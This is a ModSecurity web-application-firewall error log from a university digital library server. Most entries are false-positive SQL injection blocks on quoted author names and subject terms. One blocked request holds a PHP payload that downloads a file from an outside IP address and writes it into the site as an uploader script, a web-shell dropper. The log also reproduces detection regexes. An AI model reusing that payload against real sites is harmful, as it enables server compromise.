[Mon Aug 28 07:43:04.932630 2023] [:error] [pid 37882] [client 47.128.28.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Elisabetta Raguseo\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvtmMCo-f0AAJP6BNEAAAAM"]
[Mon Aug 28 07:46:23.071519 2023] [:error] [pid 38061] [client 52.167.144.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Principles of Management\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvuX8Co-f0AAJSt5T0AAAAR"]
[Mon Aug 28 07:46:49.835887 2023] [:error] [pid 38060] [client 47.128.28.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Gupta, R.L.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvuecCo-f0AAJSsrOcAAAAQ"]
[Mon Aug 28 07:52:07.286210 2023] [:error] [pid 38024] [client 47.128.17.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Inte-firm collaboration\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvvt8Co-f0AAJSIdz8AAAAK"]
[Mon Aug 28 07:54:13.171613 2023] [:error] [pid 38059] [client 47.128.30.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Mbohwa, Charles\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvwNcCo-f0AAJSr2hsAAAAO"]
[Mon Aug 28 07:56:45.330594 2023] [:error] [pid 37918] [client 47.128.28.139] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Frans Bijlaard\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvwzcCo-f0AAJQeRl0AAAAP"]
[Mon Aug 28 08:00:46.351802 2023] [:error] [pid 38114] [client 47.128.28.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Close-range photogrammetry\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvxvsCo-f0AAJTinUQAAAAE"]
[Mon Aug 28 08:02:32.430743 2023] [:error] [pid 38065] [client 47.128.19.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Adaptation\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvyKMCo-f0AAJSxYsIAAAAH"]
[Mon Aug 28 08:05:16.180900 2023] [:error] [pid 38149] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Evaluation\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvyzMCo-f0AAJUFNQgAAAAA"]
[Mon Aug 28 08:06:13.840343 2023] [:error] [pid 37539] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Gusman Nawanir\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvzBcCo-f0AAJKjZ60AAAAG"]
[Mon Aug 28 08:06:25.695278 2023] [:error] [pid 37539] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Visualization\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvzEcCo-f0AAJKjZ7AAAAAG"]
[Mon Aug 28 08:07:34.343921 2023] [:error] [pid 38114] [client 47.128.19.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Fernando Ruiz-P\\xc3\\xa9rez\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvzVsCo-f0AAJTinY4AAAAE"]
[Mon Aug 28 08:12:02.717634 2023] [:error] [pid 38150] [client 47.128.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Management\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv0YsCo-f0AAJUGIWoAAAAC"]
[Mon Aug 28 08:23:46.521005 2023] [:error] [pid 38388] [client 47.128.17.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22H. Husniah\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv3IsCo-f0AAJX0cFYAAAAR"]
[Mon Aug 28 08:28:47.273095 2023] [:error] [pid 38338] [client 47.128.21.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Nia Budi Puspitasari\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv4T8Co-f0AAJXCvwwAAAAJ"]
[Mon Aug 28 08:31:55.271247 2023] [:error] [pid 38386] [client 47.128.31.171] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Partial least squares (PLS) path modeling\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv5C8Co-f0AAJXyN9kAAAAM"]
[Mon Aug 28 08:32:27.354786 2023] [:error] [pid 38500] [client 47.128.30.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Project failures and success\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv5K8Co-f0AAJZkdiwAAAAD"]
[Mon Aug 28 08:50:11.251648 2023] [:error] [pid 38641] [client 47.128.28.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/JTS.EMER.2017.019.gif.gif"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOv9U8Co-f0AAJbxo@wAAAAJ"]
[Mon Aug 28 08:50:52.773025 2023] [:error] [pid 38688] [client 47.128.30.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ARENA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv9fMCo-f0AAJcg6ckAAAAD"]
[Mon Aug 28 08:52:51.293200 2023] [:error] [pid 38726] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Sistem\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv988Co-f0AAJdGkgMAAAAF"]
[Mon Aug 28 08:53:05.413880 2023] [:error] [pid 38690] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Structural fire performance\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv@AcCo-f0AAJciCuYAAAAG"]
[Mon Aug 28 08:55:09.078311 2023] [:error] [pid 38727] [client 47.128.29.171] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Tarmizi bin Ismail\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv@fcCo-f0AAJdH0DkAAAAI"]
[Mon Aug 28 08:55:51.569162 2023] [:error] [pid 38726] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Joint shear strength\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv@p8Co-f0AAJdGkgkAAAAF"]
[Mon Aug 28 09:00:02.280239 2023] [:error] [pid 38726] [client 34.72.81.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:vz. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '].'/ found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w '),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOv-osCo-f0AAJdGkj0AAAAF"]
[Mon Aug 28 09:04:50.217943 2023] [:error] [pid 38772] [client 47.128.22.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Mechanical engineering\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwAwsCo-f0AAJd0nlUAAAAC"]
[Mon Aug 28 09:06:06.096567 2023] [:error] [pid 38772] [client 47.128.31.188] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Real-world learning\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwBDsCo-f0AAJd0nlYAAAAC"]
[Mon Aug 28 09:10:25.421663 2023] [:error] [pid 38772] [client 85.208.96.204] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Weena Lokuge\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwCEcCo-f0AAJd0nmAAAAAC"]
[Mon Aug 28 09:12:47.626385 2023] [:error] [pid 39208] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Aplikasi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwCn8Co-f0AAJkoSscAAAAN"]
